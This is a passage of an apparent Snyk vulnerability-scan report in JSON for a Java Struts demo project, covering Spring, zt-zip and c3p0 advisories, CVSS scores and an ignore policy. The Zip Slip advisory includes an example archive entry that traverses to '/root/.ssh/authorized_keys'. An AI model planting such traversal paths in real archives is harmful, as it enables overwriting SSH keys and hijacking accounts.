"cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:56:21.626910Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H", + "assigner": "Red Hat", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:47:28.086179Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H", + "assigner": "NVD", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:49:48.407397Z" + } + ], + "description": "## Overview\n[org.springframework:spring-beans](https://www.baeldung.com/spring-bean) is a package that is the basis for Spring Framework's IoC container. The BeanFactory interface provides an advanced configuration mechanism capable of managing any type of object.\n\nAffected versions of this package are vulnerable to Denial of Service (DoS) if it relies on data binding to set a `MultipartFile` or `javax.servlet.Part` to a field in a model object.\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nUpgrade `org.springframework:spring-beans` to version 5.2.22.RELEASE, 5.3.20 or higher.\n## References\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/50177b1ad3485bd44239b1756f6c14607476fcf2)\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/83186b689f11f5e6efe7ccc08fdeb92f66fcd583)\n- [Tanzu vmware](https://tanzu.vmware.com/security/cve-2022-22970)\n", + "epssDetails": { + "percentile": "0.75300", + "probability": "0.00449", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2022-22970" + ], + "CWE": [ + "CWE-400" + ] + }, + "packageName": "org.springframework:spring-beans", + "proprietary": false, + "creationTime": "2022-05-12T08:45:35.744127Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2022-05-12T08:17:10Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.springframework", + "artifactId": "spring-beans" + }, + "publicationTime": "2022-05-12T09:49:10.833602Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:49:48.407397Z", + "socialTrendAlert": false, + "severityWithCritical": "medium", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.springframework:spring-web@3.2.6.RELEASE", + "org.springframework:spring-beans@3.2.6.RELEASE" + ], + "upgradePath": [ + false, + "org.springframework:spring-web@5.2.22.RELEASE", + "org.springframework:spring-beans@5.2.22.RELEASE" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.springframework:spring-beans", + "version": "3.2.6.RELEASE" + }, + { + "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-2689634", + "title": "Improper Handling of Case Sensitivity", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N/E:P", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,5.2.21)", + "[5.3.0, 5.3.19)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "5.2.21", + "5.3.19" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "low", + "cvssScore": 3.7, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.springframework:spring-context", + "references": [ + { + "url": "https://github.com/spring-projects/spring-framework/commit/833e750175349ab4fd502109a8b41af77e25cdea", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/spring-projects/spring-framework/issues/28333", + "title": "GitHub Issue" + }, + { + "url": "https://github.com/MarcinGadz/spring-rce-poc", + "title": "PoC" + }, + { + "url": "https://spring.io/blog/2022/04/13/spring-framework-data-binding-rules-vulnerability-cve-2022-22968", + "title": "Spring Blog Post" + }, + { + "url": "https://tanzu.vmware.com/security/cve-2022-22968", + "title": "Tanzu Advisory" + } + ], + "cvssDetails": [ + { + "assigner": "Red Hat", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", + "cvssV3BaseScore": 5.3, + "modificationTime": "2024-03-11T09:47:26.822810Z" + }, + { + "assigner": "NVD", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", + "cvssV3BaseScore": 5.3, + "modificationTime": "2024-03-11T09:49:16.458425Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N/E:P", + "assigner": "Snyk", + "severity": "low", + "baseScore": 3.7, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:56:31.233852Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", + "assigner": "Red Hat", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:47:26.822810Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", + "assigner": "NVD", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:49:16.458425Z" + } + ], + "description": "## Overview\n\nAffected versions of this package are vulnerable to Improper Handling of Case Sensitivity via the patterns for `disallowedFields` on a `DataBinder`. As a result, a field is not effectively protected unless it is listed with both upper and lower case for the first character of the field, including nested fields within the property path.\n## Remediation\nUpgrade `org.springframework:spring-context` to version 5.2.21, 5.3.19 or higher.\n## References\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/833e750175349ab4fd502109a8b41af77e25cdea)\n- [GitHub Issue](https://github.com/spring-projects/spring-framework/issues/28333)\n- [PoC](https://github.com/MarcinGadz/spring-rce-poc)\n- [Spring Blog Post](https://spring.io/blog/2022/04/13/spring-framework-data-binding-rules-vulnerability-cve-2022-22968)\n- [Tanzu Advisory](https://tanzu.vmware.com/security/cve-2022-22968)\n", + "epssDetails": { + "percentile": "0.29205", + "probability": "0.00065", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2022-22968" + ], + "CWE": [ + "CWE-178" + ] + }, + "packageName": "org.springframework:spring-context", + "proprietary": false, + "creationTime": "2022-04-14T11:54:10.207823Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2022-04-14T11:43:54Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.springframework", + "artifactId": "spring-context" + }, + "publicationTime": "2022-04-14T12:09:40Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:49:16.458425Z", + "socialTrendAlert": false, + "severityWithCritical": "low", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.springframework:spring-web@3.2.6.RELEASE", + "org.springframework:spring-context@3.2.6.RELEASE" + ], + "upgradePath": [ + false, + "org.springframework:spring-web@5.0.0.RELEASE" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.springframework:spring-context", + "version": "3.2.6.RELEASE" + }, + { + "id": "SNYK-JAVA-ORGZEROTURNAROUND-31681", + "title": "Arbitrary File Write via Archive Extraction (Zip Slip)", + "CVSSv3": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N", + "credit": [ + "Snyk Security research Team" + ], + "semver": { + "vulnerable": [ + "[,1.13)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "1.13" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 5.5, + "functions": [ + { + "version": [ + "[,1.13)" + ], + "functionId": { + "filePath": "org/zeroturnaround/zip/ZipUtil$Unpacker.java", + "className": "ZipUtil$Unpacker", + "functionName": "process" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "org.zeroturnaround:zt-zip", + "references": [ + { + "url": "https://github.com/zeroturnaround/zt-zip/commit/759b72f33bc8f4d69f84f09fcb7f010ad45d6fff", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/snyk/zip-slip-vulnerability", + "title": "Zip Slip Advisory" + }, + { + "url": "https://security.snyk.io/research/zip-slip-vulnerability", + "title": "Zip Slip Advisory" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N", + "cvssV3BaseScore": 5.5, + "modificationTime": "2024-03-11T09:47:21.493786Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 5.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:03:19.847161Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N", + "assigner": "NVD", + "severity": "medium", + "baseScore": 5.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:47:21.493786Z" + } + ], + "description": "## Overview\r\n[`org.zeroturnaround:zt-zip`](https://github.com/zeroturnaround/zt-zip) is a library that helps to create, modify or extract ZIP archives.\r\n\r\nAffected versions of the package are vulnerable to Arbitrary File Write via Archive Extraction (AKA \"Zip Slip\").\r\n\r\nIt is exploited using a specially crafted zip archive, that holds path traversal filenames. When exploited, a filename in a malicious archive is concatenated to the target extraction directory, which results in the final path ending up outside of the target folder. For instance, a zip may hold a file with a \"../../file.exe\" location and thus break out of the target folder. If an executable or a configuration file is overwritten with a file containing malicious code, the problem can turn into an arbitrary code execution issue quite easily.\r\n\r\nThe following is an example of a zip archive with one benign file and one malicious file. Extracting the malicous file will result in traversing out of the target folder, ending up in `/root/.ssh/` overwriting the `authorized_keys` file:\r\n\r\n```\r\n\r\n+2018-04-15 22:04:29 ..... 19 19 good.txt\r\n\r\n+2018-04-15 22:04:42 ..... 20 20 ../../../../../../root/.ssh/authorized_keys\r\n\r\n```\r\n\r\n## Vulnerable Method\r\nThis vulnerability appears in method `process` under class name `Unpacker` in `org/zeroturnaround/zip/ZipUtil.java` [[1]](https://github.com/zeroturnaround/zt-zip/commit/759b72f33bc8f4d69f84f09fcb7f010ad45d6fff)\r\n\r\n\r\n## Remediation\r\nUpgrade `org.zeroturnaround:zt-zip` to version 1.13 or higher.\n\n## References\n- [https://github.com/zeroturnaround/zt-zip/commit/759b72f33bc8f4d69f84f09fcb7f010ad45d6fff](https://github.com/zeroturnaround/zt-zip/commit/759b72f33bc8f4d69f84f09fcb7f010ad45d6fff)\n- [https://github.com/snyk/zip-slip-vulnerability](https://github.com/snyk/zip-slip-vulnerability)\n- [https://security.snyk.io/research/zip-slip-vulnerability](https://security.snyk.io/research/zip-slip-vulnerability)\n", + "epssDetails": { + "percentile": "0.34705", + "probability": "0.00079", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2018-1002201" + ], + "CWE": [ + "CWE-29" + ] + }, + "packageName": "org.zeroturnaround:zt-zip", + "proprietary": true, + "creationTime": "2018-05-30T12:32:02.349000Z", + "functions_new": [ + { + "version": [ + "[,1.13)" + ], + "functionId": { + "className": "org.zeroturnaround.zip.ZipUtil$Unpacker", + "functionName": "process" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2018-04-17T21:00:00Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.zeroturnaround", + "artifactId": "zt-zip" + }, + "publicationTime": "2018-05-31T07:32:02Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:47:21.493786Z", + "socialTrendAlert": false, + "severityWithCritical": "medium", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.zeroturnaround:zt-zip@1.12" + ], + "upgradePath": [ + false, + "org.zeroturnaround:zt-zip@1.13" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.zeroturnaround:zt-zip", + "version": "1.12" + } + ], + "ok": false, + "dependencyCount": 60, + "org": "austin.doll", + "policy": "# Snyk (https://snyk.io) policy file, patches or ignores known vulnerabilities.\nversion: v1.25.1\n# ignores vulnerabilities until expiry date; change duration by modifying expiry date\nignore:\n SNYK-JAVA-C3P0-461017:\n - '*':\n reason: test\n created: '2024-07-25T12:49:20.019Z'\n expires: '2024-08-08T12:49:19.816Z'\n ignoredBy:\n id: d9b21e67-191b-45cf-9bc0-f82258937fc6\n name: austin.doll@snyk.io\n email: austin.doll@snyk.io\n reasonType: not-vulnerable\n disregardIfFixable: false\n source: api\n SNYK-JAVA-ORGAPACHESTRUTS-30207:\n - '*':\n reason: test\n created: '2024-07-25T12:48:35.155Z'\n expires: '2024-08-08T12:48:34.932Z'\n ignoredBy:\n id: d9b21e67-191b-45cf-9bc0-f82258937fc6\n name: austin.doll@snyk.io\n email: austin.doll@snyk.io\n reasonType: not-vulnerable\n disregardIfFixable: false\n source: api\n SNYK-JAVA-ORGAPACHESTRUTS-30771:\n - '*':\n reason: test\n created: '2024-07-25T12:49:09.757Z'\n expires: '2024-08-08T12:49:09.570Z'\n ignoredBy:\n id: d9b21e67-191b-45cf-9bc0-f82258937fc6\n name: austin.doll@snyk.io\n email: austin.doll@snyk.io\n reasonType: not-vulnerable\n disregardIfFixable: false\n source: api\n SNYK-JAVA-ORGAPACHESTRUTS-30772:\n - '*':\n reason: test\n created: '2024-07-25T12:48:38.078Z'\n expires: '2024-08-08T12:48:37.849Z'\n ignoredBy:\n id: d9b21e67-191b-45cf-9bc0-f82258937fc6\n name: austin.doll@snyk.io\n email: austin.doll@snyk.io\n reasonType: not-vulnerable\n disregardIfFixable: false\n source: api\n SNYK-JAVA-ORGAPACHESTRUTS-30778:\n - '*':\n reason: test\n created: '2024-07-25T12:49:14.737Z'\n expires: '2024-08-08T12:49:14.556Z'\n ignoredBy:\n id: d9b21e67-191b-45cf-9bc0-f82258937fc6\n name: austin.doll@snyk.io\n email: austin.doll@snyk.io\n reasonType: not-vulnerable\n disregardIfFixable: false\n source: api\n SNYK-JAVA-ORGAPACHESTRUTS-31503:\n - '*':\n reason: test\n created: '2024-07-25T12:48:49.330Z'\n expires: '2024-08-08T12:48:49.098Z'\n ignoredBy:\n id: d9b21e67-191b-45cf-9bc0-f82258937fc6\n name: austin.doll@snyk.io\n email: austin.doll@snyk.io\n reasonType: not-vulnerable\n disregardIfFixable: false\n source: api\n SNYK-JAVA-ORGAPACHESTRUTS-451610:\n - '*':\n reason: test\n created: '2024-07-25T12:49:12.566Z'\n expires: '2024-08-08T12:49:12.322Z'\n ignoredBy:\n id: d9b21e67-191b-45cf-9bc0-f82258937fc6\n name: austin.doll@snyk.io\n email: austin.doll@snyk.io\n reasonType: not-vulnerable\n disregardIfFixable: false\n source: api\n SNYK-JAVA-ORGAPACHESTRUTS-608097:\n - '*':\n reason: test\n created: '2024-07-25T12:48:52.394Z'\n expires: '2024-08-08T12:48:52.149Z'\n ignoredBy:\n id: d9b21e67-191b-45cf-9bc0-f82258937fc6\n name: austin.doll@snyk.io\n email: austin.doll@snyk.io\n reasonType: not-vulnerable\n disregardIfFixable: false\n source: api\n SNYK-JAVA-COMMONSFILEUPLOAD-30401:\n - '*':\n reason: test\n created: '2024-07-25T12:49:17.345Z'\n expires: '2024-08-08T12:49:17.086Z'\n ignoredBy:\n id: d9b21e67-191b-45cf-9bc0-f82258937fc6\n name: austin.doll@snyk.io\n email: austin.doll@snyk.io\n reasonType: not-vulnerable\n disregardIfFixable: false\n source: api\n SNYK-JAVA-ORGAPACHESTRUTS-1049003:\n - '*':\n reason: test\n created: '2024-07-25T12:48:40.620Z'\n expires: '2024-08-08T12:48:40.431Z'\n ignoredBy:\n id: d9b21e67-191b-45cf-9bc0-f82258937fc6\n name: austin.doll@snyk.io\n email: austin.doll@snyk.io\n reasonType: not-vulnerable\n disregardIfFixable: false\n source: api\n SNYK-JAVA-ORGAPACHESTRUTS-6102825:\n - '*':\n reason: test\n created: '2024-07-25T12:48:43.321Z'\n expires: '2024-08-08T12:48:43.099Z'\n ignoredBy:\n id: d9b21e67-191b-45cf-9bc0-f82258937fc6\n name: austin.doll@snyk.io\n email: austin.doll@snyk.io\n reasonType: not-vulnerable\n disregardIfFixable: false\n source: api\n SNYK-JAVA-COMMONSCOLLECTIONS-30078:\n - '*':\n reason: test\n created: '2024-07-25T12:48:57.621Z'\n expires: '2024-08-08T12:48:57.394Z'\n ignoredBy:\n id: d9b21e67-191b-45cf-9bc0-f82258937fc6\n name: austin.doll@snyk.io\n email: austin.doll@snyk.io\n reasonType: not-vulnerable\n disregardIfFixable: false\n source: api\n SNYK-JAVA-COMMONSCOLLECTIONS-6056408:\n - '*':\n reason: test\n created: '2024-07-25T12:49:03.652Z'\n expires: '2024-08-08T12:49:03.427Z'\n ignoredBy:\n id: d9b21e67-191b-45cf-9bc0-f82258937fc6\n name: austin.doll@snyk.io\n email: austin.doll@snyk.io\n reasonType: not-vulnerable\n disregardIfFixable: false\n source: api\n SNYK-JAVA-ORGSPRINGFRAMEWORK-2436751:\n - '*':\n reason: test\n created: '2024-07-25T12:49:07.017Z'\n expires: '2024-08-08T12:49:06.669Z'\n ignoredBy:\n id: d9b21e67-191b-45cf-9bc0-f82258937fc6\n name: austin.doll@snyk.io\n email: austin.doll@snyk.io\n reasonType: not-vulnerable\n disregardIfFixable: false\n source: api\n SNYK-JAVA-ORGAPACHELOGGINGLOG4J-31409:\n - '*':\n reason: test\n created: '2024-07-25T12:48:54.986Z'\n expires: '2024-08-08T12:48:54.807Z'\n ignoredBy:\n id: d9b21e67-191b-45cf-9bc0-f82258937fc6\n name: austin.doll@snyk.io\n email: austin.doll@snyk.io\n reasonType: not-vulnerable\n disregardIfFixable: false\n source: api\n SNYK-JAVA-ORGAPACHELOGGINGLOG4J-2314720:\n - '*':\n reason: test\n created: '2024-07-25T13:04:24.344Z'\n expires: '2024-08-08T13:04:24.004Z'\n ignoredBy:\n id: d9b21e67-191b-45cf-9bc0-f82258937fc6\n name: austin.doll@snyk.io\n email: austin.doll@snyk.io\n reasonType: not-vulnerable\n disregardIfFixable: false\n source: api\n SNYK-JAVA-ORGAPACHELOGGINGLOG4J-2320014:\n - '*':\n reason: test\n created: '2024-07-25T12:48:46.732Z'\n expires: '2024-08-08T12:48:46.464Z'\n ignoredBy:\n id: d9b21e67-191b-45cf-9bc0-f82258937fc6\n name: austin.doll@snyk.io\n email: austin.doll@snyk.io\n reasonType: not-vulnerable\n disregardIfFixable: false\n source: api\n 'snyk:lic:maven:javax.servlet:jstl:CDDL-1.0':\n - '*':\n reason: test\n created: '2024-07-25T12:42:03.254Z'\n expires: '2024-08-08T12:42:03.038Z'\n ignoredBy:\n id: d9b21e67-191b-45cf-9bc0-f82258937fc6\n name: austin.doll@snyk.io\n email: austin.doll@snyk.io\n reasonType: not-vulnerable\n disregardIfFixable: false\n source: api\n 'snyk:lic:maven:org.aspectj:aspectjweaver:EPL-1.0':\n - '*':\n reason: test\n created: '2024-07-25T12:42:05.981Z'\n expires: '2024-08-08T12:42:05.813Z'\n ignoredBy:\n id: d9b21e67-191b-45cf-9bc0-f82258937fc6\n name: austin.doll@snyk.io\n email: austin.doll@snyk.io\n reasonType: not-vulnerable\n disregardIfFixable: false\n source: api\n 'snyk:lic:maven:org.hibernate:hibernate-core:LGPL-2.0':\n - '*':\n reason: test\n created: '2024-07-25T12:42:08.720Z'\n expires: '2024-08-08T12:42:08.485Z'\n ignoredBy:\n id: d9b21e67-191b-45cf-9bc0-f82258937fc6\n name: austin.doll@snyk.io\n email: austin.doll@snyk.io\n reasonType: not-vulnerable\n disregardIfFixable: false\n source: api\n 'snyk:lic:maven:org.jboss.logging:jboss-logging:LGPL-2.1':\n - '*':\n reason: test\n created: '2024-07-25T12:42:18.672Z'\n expires: '2024-08-08T12:42:18.434Z'\n ignoredBy:\n id: d9b21e67-191b-45cf-9bc0-f82258937fc6\n name: austin.doll@snyk.io\n email: austin.doll@snyk.io\n reasonType: not-vulnerable\n disregardIfFixable: false\n source: api\n 'snyk:lic:maven:org.hibernate:hibernate-entitymanager:LGPL-2.0':\n - '*':\n reason: test\n created: '2024-07-25T12:42:10.980Z'\n expires: '2024-08-08T12:42:10.799Z'\n ignoredBy:\n id: d9b21e67-191b-45cf-9bc0-f82258937fc6\n name: austin.doll@snyk.io\n email: austin.doll@snyk.io\n reasonType: not-vulnerable\n disregardIfFixable: false\n source: api\n 'snyk:lic:maven:org.hibernate.common:hibernate-commons-annotations:LGPL-2.1':\n - '*':\n reason: test\n created: '2024-07-25T12:42:13.344Z'\n expires: '2024-08-08T12:42:13.100Z'\n ignoredBy:\n id: d9b21e67-191b-45cf-9bc0-f82258937fc6\n name: austin.doll@snyk.io\n email: austin.doll@snyk.io\n reasonType: not-vulnerable\n disregardIfFixable: false\n source: api\n 'snyk:lic:maven:org.hibernate.javax.persistence:hibernate-jpa-2.1-api:EPL-1.0':\n - '*':\n reason: test\n created: '2024-07-25T12:42:16.421Z'\n expires: '2024-08-08T12:42:15.686Z'\n ignoredBy:\n id: d9b21e67-191b-45cf-9bc0-f82258937fc6\n name: austin.doll@snyk.io\n email: austin.doll@snyk.io\n reasonType: not-vulnerable\n disregardIfFixable: false\n source: api\npatch: {}\n", + "isPrivate": true, + "licensesPolicy": { + "severities": {}, + "orgLicenseRules": { + "AGPL-1.0": { + "licenseType": "AGPL-1.0", + "severity": "high", + "instructions": "" + }, + "AGPL-3.0": { + "licenseType": "AGPL-3.0", + "severity": "high", + "instructions": "" + }, + "Artistic-1.0": { + "licenseType": "Artistic-1.0", + "severity": "medium", + "instructions": "" + }, + "Artistic-2.0": { + "licenseType": "Artistic-2.0", + "severity": "medium", + "instructions": "" + }, + "CDDL-1.0": { + "licenseType": "CDDL-1.0", + "severity": "medium", + "instructions": "" + }, + "CPOL-1.02": { + "licenseType": "CPOL-1.02", + "severity": "high", + "instructions": "" + }, + "EPL-1.0": { + "licenseType": "EPL-1.0", + "severity": "medium", + "instructions": "" + }, + "GPL-2.0": { + "licenseType": "GPL-2.0", + "severity": "high", + "instructions": "" + }, + "GPL-3.0": { + "licenseType": "GPL-3.0", + "severity": "high", + "instructions": "" + }, + "LGPL-2.0": { + "licenseType": "LGPL-2.0", + "severity": "medium", + "instructions": "" + }, + "LGPL-3.0": { + "licenseType": "LGPL-3.0", + "severity": "medium", + "instructions": "" + }, + "MPL-1.1": { + "licenseType": "MPL-1.1", + "severity": "medium", + "instructions": "" + }, + "MPL-2.0": { + "licenseType": "MPL-2.0", + "severity": "medium", + "instructions": "" + }, + "MS-RL": { + "licenseType": "MS-RL", + "severity": "medium", + "instructions": "" + }, + "SimPL-2.0": { + "licenseType": "SimPL-2.0", + "severity": "high", + "instructions": "" + }, + "LGPL-2.1": { + "licenseType": "LGPL-2.1", + "severity": "medium", + "instructions": "" + } + } + }, + "packageManager": "maven", + "projectId": "c13bd200-599a-4ac3-8ad7-abbf32182fdc", + "ignoreSettings": { + "adminOnly": false, + "reasonRequired": true, + "disregardFilesystemIgnores": false + }, + "summary": "150 vulnerable dependency paths", + "remediation": { + "unresolved": [ + { + "id": "SNYK-JAVA-C3P0-461018", + "title": "Denial of Service (DoS)", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P/RL:O", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[0,]" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 7.5, + "functions": [ + { + "version": [ + "[0.9.1,]" + ], + "functionId": { + "filePath": "com/mchange/v2/c3p0/cfg/C3P0ConfigXmlUtils.java", + "className": "C3P0ConfigXmlUtils", + "functionName": "extractXmlConfigFromInputStream" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "c3p0:c3p0", + "references": [ + { + "url": "https://hackerone.com/reports/509315", + "title": "POC: Hackerone Report" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:48:38.831457Z" + }, + { + "assigner": "Red Hat", + "severity": "medium", + "cvssV3Vector": "CVSS:3.0/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 4.4, + "modificationTime": "2024-03-11T09:48:53.496388Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P/RL:O", + "assigner": "Snyk", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:02:14.895852Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:48:38.831457Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H", + "assigner": "Red Hat", + "severity": "medium", + "baseScore": 4.4, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:48:53.496388Z" + } + ], + "description": "## Overview\n[c3p0:c3p0](https://mvnrepository.com/artifact/c3p0/c3p0) is a lIbrary for augmenting traditional (DriverManager-based) JDBC drivers with JNDI-bindable DataSources, including DataSources that implement Connection and Statement Pooling, as described by the jdbc3 spec and jdbc2 std extension. Note: This library is no longer maintained and has migrated to the artifact \r\n\"com.mchange:c3p0\"\n\nAffected versions of this package are vulnerable to Denial of Service (DoS) due to missing protections against recursive entity expansion when loading XML configurations.\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nThere is no fixed version for `c3p0:c3p0`.\n\n## References\n- [POC: Hackerone Report](https://hackerone.com/reports/509315)\n", + "epssDetails": { + "percentile": "0.90102", + "probability": "0.02457", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2019-5427" + ], + "CWE": [ + "CWE-776" + ], + "GHSA": [ + "GHSA-84p2-vf58-xhxv" + ] + }, + "packageName": "c3p0:c3p0", + "proprietary": false, + "creationTime": "2019-09-05T16:24:58.914446Z", + "functions_new": [ + { + "version": [ + "[0.9.1,]" + ], + "functionId": { + "className": "com.mchange.v2.c3p0.cfg.C3P0ConfigXmlUtils", + "functionName": "extractXmlConfigFromInputStream" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2019-04-22T22:18:26Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "c3p0", + "artifactId": "c3p0" + }, + "publicationTime": "2019-04-22T22:18:26Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:48:53.496388Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + 